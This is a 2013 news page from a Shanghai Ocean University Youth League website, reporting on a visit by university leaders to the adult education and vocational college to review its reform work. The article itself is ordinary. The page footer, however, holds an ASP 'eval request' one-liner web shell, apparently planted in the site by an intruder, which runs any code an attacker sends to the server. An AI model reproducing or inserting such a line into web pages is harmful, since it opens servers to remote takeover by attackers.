当前位置:共青团上海海洋大学委员会 >> 新闻中心 >> 要闻速递 >> 正文  
站内信息搜索:
校领导一行到成教高职学院调研工作
[2013年10月12日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

    10月11日下午在军工路校区培训中心会议室,潘迎捷校长、封金章副校长带队校办、人事处、财务处、规划处、纪监审、后勤等有关职能部门领导一行到成教学院调研工作,成教和高职学院的全体领导都参加了会议。

    许四杰院长代表学院领导班子,向校领导和有关职能部门领导介绍了学院目前的基本情况,介绍了新班子成立以来的工作思路和已经完成的工作、目前正在推进的工作等,并就目前学院在改革发展中急待破解的难题向在座的领导们做了报告。高职学院常务副院长闻人勇建教授针对目前高职在院学生的教育、培养和管理等情况作了补充汇报。

    在认真听取学院工作汇报基础上,各职能部门领导结合新班子成立以来已经开展的一些具体工作的多次会商情况做了交流发言和指导。封金章副校长发言,首先对学院新领导班子带领学院全体教职工开展的工作和已经取得的初步成效表示充分肯定和支持,对学院目前在发展中遇到的问题,指出可以借鉴兄弟院校的经验,及时调整思路,同时指导学院要建立两个收入分配机制、建立成本管理意识并规范各项管理工作。

    最后,潘迎捷校长发言指出,成教学院目前处于重要的、关键的或者说艰难的转型期,传统的办学模式受到了很大的挑战。需要学院新班子认真思考、做好学院转型定位,用改革和发展来解决问题。在发展中要抓机遇、抓定位、抓人心、抓管理。学院要充分发挥自主办学的优势,在业务拓展上大显身手、在提高质量上大下功夫、在办学模式上大力改革、在资源整合上大有作为。会上,潘校长还就网络课程建设、分配改革以及一些具体问题协调进行了现场办公指导。

 

关闭窗口

上一篇:我校召开2013-2014学年第二次校长办公会议

下一篇:我校龙舟队在“霸王杯”龙舟争霸赛中勇夺霸王杯
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>